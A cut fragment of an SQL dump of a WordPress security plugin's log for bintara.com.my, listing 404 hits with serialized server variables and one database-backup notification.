09:54:50',31305704,33112464,'https://bintara.com.my/?page_id=18',1,0,'87.197.137.223'),(26812,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYdJUjkYtOEVzsOgB0Lg1QAAAJA\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.106.242\";s:11:\"REMOTE_PORT\";s:5:\"54799\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYdJUjkYtOEVzsOgB0Lg1QAAAJA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569147219.0299\";s:12:\"REQUEST_TIME\";s:10:\"1569147219\";}}','notice','2019-09-22 10:13:41','2019-09-22 10:13:39',31144360,32946304,'https://bintara.com.my/our-history/about1/',1,0,'27.102.106.242'),(26813,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:136:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.42\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"78.85.16.96\";s:11:\"REMOTE_PORT\";s:5:\"53841\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYdUKNeO@M5TS0tioplfHAAAAFA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569149992.9264\";s:12:\"REQUEST_TIME\";s:10:\"1569149992\";}}','notice','2019-09-22 10:59:55','2019-09-22 10:59:53',31300144,33106744,'https://bintara.com.my/?page_id=18',1,0,'78.85.16.96'),(26951,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/2013/01/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_ACCEPT_CHARSET\";s:36:\"utf-8;q=0.7,iso-8859-1;q=0.2,*;q=0.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/2013/01/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/2013/01/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYrOhohQ4pD4smMfGAQElgAAAJU\";s:12:\"REDIRECT_URL\";s:9:\"/2013/01/\";s:11:\"REMOTE_ADDR\";s:14:\"216.244.66.228\";s:11:\"REMOTE_PORT\";s:5:\"47280\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/2013/01/\";s:10:\"SCRIPT_URL\";s:9:\"/2013/01/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYrOhohQ4pD4smMfGAQElgAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569377926.9885\";s:12:\"REQUEST_TIME\";s:10:\"1569377926\";}}','notice','2019-09-25 02:18:48','2019-09-25 02:18:47',30757040,32572192,'https://bintara.com.my/2013/01/',1,0,'216.244.66.228'),(26952,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/tag/alignment/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_ACCEPT_CHARSET\";s:36:\"utf-8;q=0.7,iso-8859-1;q=0.2,*;q=0.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/tag/alignment/\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/tag/alignment/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYrOv-TT-ZZc8Zptu2CJFAAAAQI\";s:12:\"REDIRECT_URL\";s:15:\"/tag/alignment/\";s:11:\"REMOTE_ADDR\";s:14:\"216.244.66.228\";s:11:\"REMOTE_PORT\";s:5:\"58232\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/tag/alignment/\";s:10:\"SCRIPT_URL\";s:15:\"/tag/alignment/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYrOv-TT-ZZc8Zptu2CJFAAAAQI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569377983.6272\";s:12:\"REQUEST_TIME\";s:10:\"1569377983\";}}','notice','2019-09-25 02:19:45','2019-09-25 02:19:44',30755464,32560656,'https://bintara.com.my/tag/alignment/',1,0,'216.244.66.228'),(26953,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 QIHU 360SE\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"223.206.242.226\";s:11:\"REMOTE_PORT\";s:5:\"49616\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYrRGyC9qkCozCNGajHTMgAAAVE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569378587.9191\";s:12:\"REQUEST_TIME\";s:10:\"1569378587\";}}','notice','2019-09-25 02:29:49','2019-09-25 02:29:48',30818624,32630624,'https://bintara.com.my/?page_id=18',1,0,'223.206.242.226'),(26954,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"EA6D1B55-FB02-4F0F-B698-A1F79D393B4E\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYrckyC9qkCozCNGajHltQAAAUk\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.112\";s:11:\"REMOTE_PORT\";s:5:\"51995\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYrckyC9qkCozCNGajHltQAAAUk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569381523.983\";s:12:\"REQUEST_TIME\";s:10:\"1569381523\";}}','notice','2019-09-25 03:18:45','2019-09-25 03:18:44',31090208,32900264,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.112'),(26955,0,'notification_center','send::backup','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:33:\"[bintara.com.my/] Database Backup\";}','debug','2019-09-25 03:27:20','2019-09-25 03:26:39',33280520,105021040,'wp-cron',1,0,'103.6.198.69'),(26956,0,'backup','email-succeeded','a:5:{s:8:\"settings\";a:9:{s:9:\"all_sites\";b:0;s:6:\"method\";i:1;s:8:\"location\";s:84:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups\";s:6:\"retain\";i:0;s:3:\"zip\";b:1;s:7:\"exclude\";a:2:{i:0;s:14:\"itsec_lockouts\";i:1;s:10:\"itsec_temp\";}s:7:\"enabled\";b:1;s:8:\"interval\";i:7;s:8:\"last_run\";i:1568777352;}s:12:\"mail_success\";b:1;s:4:\"file\";s:163:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups/backup-bintara-solutions-sd-20190925-112640-qwzE6MLmJoZkYjb2PiDpuwEvBUmyoC.sql\";s:11:\"output_file\";s:163:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups/backup-bintara-solutions-sd-20190925-112640-qwzE6MLmJoZkYjb2PiDpuwEvBUmyoC.zip\";s:4:\"size\";i:3338220;}','notice','2019-09-25 03:27:24','2019-09-25 03:26:39',37493552,105021040,'wp-cron',1,0,'103.6.198.69'),(26957,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"194.114.129.131\";s:11:\"REMOTE_PORT\";s:5:\"34440\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYre9Xlb-cYDmeWuuufhWgAAAEQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569382133.6909\";s:12:\"REQUEST_TIME\";s:10:\"1569382133\";}}','notice','2019-09-25 03:28:55','2019-09-25 03:28:54',30819968,32637320,'https://bintara.com.my/?page_id=18',1,0,'194.114.129.131'),(26958,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:88:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYrgcXlb-cYDmeWuuufh3wAAAEY\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.129.131\";s:11:\"REMOTE_PORT\";s:5:\"61681\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYrgcXlb-cYDmeWuuufh3wAAAEY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569382513.8287\";s:12:\"REQUEST_TIME\";s:10:\"1569382513\";}}','notice','2019-09-25 03:35:15','2019-09-25 03:35:14',30759424,32574432,'https://bintara.com.my/our-history/about1/',1,0,'27.102.129.131'),(26959,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"700D1681-E2A2-4729-B192-DB7B304CF960\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY